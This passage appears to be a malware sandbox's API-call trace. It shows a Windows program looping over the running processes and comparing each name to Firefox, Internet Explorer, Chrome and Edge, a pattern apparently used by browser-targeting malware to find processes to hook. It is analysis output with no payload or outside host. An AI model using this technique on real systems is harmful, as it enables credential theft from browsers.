lpString2="microsoftedgecp.exe") returned -1 [0250.524] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.524] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.524] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.524] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.524] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.524] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.525] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.525] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.525] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.525] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.525] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0250.525] CloseHandle (hObject=0xd4) returned 1 [0250.525] Sleep (dwMilliseconds=0x3e8) [0251.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0251.553] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.554] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0251.554] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0251.554] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0251.554] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0251.554] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.554] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0251.554] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0251.554] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0251.554] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0251.555] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.555] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0251.555] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0251.555] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0251.555] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.555] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.556] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0251.556] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0251.556] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0251.556] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.556] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0251.556] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0251.556] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0251.556] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.556] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.557] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0251.557] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0251.557] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0251.557] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.557] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0251.557] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0251.557] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0251.557] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.557] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.558] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0251.558] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0251.558] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0251.558] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.558] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.559] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0251.559] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0251.559] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0251.559] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0251.559] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0251.559] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0251.559] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0251.559] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.559] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.560] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.560] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.561] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.561] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.561] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.561] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.561] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.561] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.561] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.562] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.562] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.562] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.563] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0251.563] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0251.563] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0251.563] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.563] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.563] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.563] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.564] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.564] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.564] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.564] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.564] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.565] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0251.565] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0251.565] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0251.565] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.565] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0251.565] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0251.565] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0251.565] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.565] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0251.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0251.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0251.566] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.566] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.566] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.566] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.566] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.566] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0251.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0251.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0251.567] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.567] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0251.567] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0251.567] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0251.567] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0251.567] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.567] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0251.568] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0251.568] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0251.568] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0251.568] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.568] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0251.569] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0251.569] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0251.569] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0251.569] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0251.569] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0251.569] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0251.569] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0251.569] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.569] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0251.570] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0251.570] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0251.570] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0251.570] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.570] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0251.570] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0251.570] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0251.570] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0251.570] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.570] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0251.571] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0251.571] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0251.571] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0251.571] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.571] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0251.571] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0251.571] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0251.571] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0251.572] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0251.572] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0251.572] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0251.572] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0251.572] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0251.573] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0251.573] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0251.573] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0251.573] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0251.573] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0251.573] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0251.573] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0251.573] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0251.574] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0251.574] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0251.574] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0251.574] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0251.574] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0251.574] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0251.574] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0251.574] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0251.575] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0251.575] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0251.575] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0251.575] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.575] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0251.576] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0251.576] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0251.576] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0251.576] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 